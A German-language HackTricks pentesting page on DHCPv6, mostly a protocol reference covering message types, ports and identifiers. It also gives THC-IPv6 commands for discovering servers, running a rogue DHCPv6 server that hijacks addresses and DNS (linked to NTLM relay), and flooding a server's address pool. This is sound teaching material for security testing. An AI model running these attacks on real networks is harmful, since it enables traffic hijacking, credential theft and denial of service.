DHCPv6
Tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
DHCPv6 vs. DHCPv4 Message Types Comparison
Eine Gegenüberstellung der DHCPv6- und DHCPv4-Nachrichtentypen ist in der folgenden Tabelle dargestellt:
| DHCPv6 Message Type | DHCPv4 Message Type |
|---|---|
| Solicit (1) | DHCPDISCOVER |
| Advertise (2) | DHCPOFFER |
| Request (3), Renew (5), Rebind (6) | DHCPREQUEST |
| Reply (7) | DHCPACK / DHCPNAK |
| Release (8) | DHCPRELEASE |
| Information-Request (11) | DHCPINFORM |
| Decline (9) | DHCPDECLINE |
| Confirm (4) | keine |
| Reconfigure (10) | DHCPFORCERENEW |
| Relay-Forw (12), Relay-Reply (13) | keine |
Detaillierte Erklärung der DHCPv6-Nachrichtentypen:
- Solicit (1): Wird von einem DHCPv6-Client initiiert, um verfügbare Server zu finden.
- Advertise (2): Wird von Servern als Antwort auf ein Solicit gesendet und zeigt die Verfügbarkeit von DHCP-Dienst an.
- Request (3): Clients verwenden dies, um IP-Adressen oder Präfixe von einem bestimmten Server anzufordern.
- Confirm (4): Wird vom Client verwendet, um zu überprüfen, ob die zugewiesenen Adressen im Netzwerk noch gültig sind, typischerweise nach einer Netzwerkänderung.
- Renew (5): Clients senden dies an den ursprünglichen Server, um Laufzeiten von Adressen zu verlängern oder Konfigurationen zu aktualisieren.
- Rebind (6): An jeden Server gesendet, um Laufzeiten zu verlängern oder Konfigurationen zu aktualisieren, besonders wenn auf ein Renew keine Antwort erfolgt.
- Reply (7): Server verwenden dies, um Adressen, Konfigurationsparameter bereitzustellen oder Nachrichten wie Release oder Decline zu bestätigen.
- Release (8): Clients informieren den Server, eine oder mehrere zugewiesene Adressen nicht mehr zu verwenden.
- Decline (9): Von Clients gesendet, um mitzuteilen, dass zugewiesene Adressen im Netzwerk einen Konflikt aufweisen.
- Reconfigure (10): Server veranlassen Clients, Transaktionen für neue oder aktualisierte Konfigurationen zu starten.
- Information-Request (11): Clients fordern Konfigurationsparameter an, ohne eine IP-Adresszuweisung zu verlangen.
- Relay-Forw (12): Relay-Agenten leiten Nachrichten an Server weiter.
- Relay-Repl (13): Server antworten Relay-Agenten, die die Nachricht dann an den Client zustellen.
Kurze Protokollhinweise (Offensiv)
- DHCPv6-Clients verwenden UDP-Port
546und Server/Relays verwenden UDP-Port547. - Clients senden Solicit an All_DHCP_Relay_Agents_and_Servers (
ff02::1:2); Server/Relays lauschen dort. All_DHCP_Servers istff05::1:3. - Client- und Server-Identitäten werden in
OPTION_CLIENTIDundOPTION_SERVERIDmithilfe von DUIDs übertragen. Das ist praktisch zum fingerprinting desselben Hosts über Adressänderungen hinweg. - Die Adresszuweisung wird mit
IA_NA(nicht-temporäre Adresse) angefordert und die Präfix-Delegation mitIA_PD(Präfix des nachgelagerten Routers).
Quick Recon
# Basic DHCPv6 traffic capture
sudo tcpdump -vvv -i <IFACE> 'udp port 546 or udp port 547'
# THC-IPv6: discover DHCPv6 servers and their options
sudo atk6-dump_dhcp6 <IFACE>
Rogue DHCPv6 Server (Address/DNS Hijack)
# THC-IPv6: rogue DHCPv6 server advertising address + DNS
sudo atk6-fake_dhcps6 <IFACE> <PREFIX>/<LEN> <DNSv6>
Dies ist ein generischer on-link rogue DHCPv6-Server. In Windows/AD-Netzwerken kombinieren Sie diesen mit höherstufigen relays (siehe die IPv6-Seite), wenn Sie NTLM relay primitives benötigen.
Pool-Erschöpfung / DHCPv6 Starvation
# THC-IPv6: exhaust the server's address pool
sudo atk6-flood_dhcpc6 <IFACE>
Hinweis zu Reconfigure-Nachrichten
DHCPv6 Reconfigure wird nicht blind akzeptiert: Clients akzeptieren es nur, wenn sie explizit OPTION_RECONF_ACCEPT gesendet haben. Standardmäßig ist ein Client nicht bereit, Reconfigure-Nachrichten zu akzeptieren, daher schlagen unsichere Reconfigure-Angriffe oft fehl, es sei denn, Sie beobachten/erzwingen diese Option.
Referenzen
-
https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages
Tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.


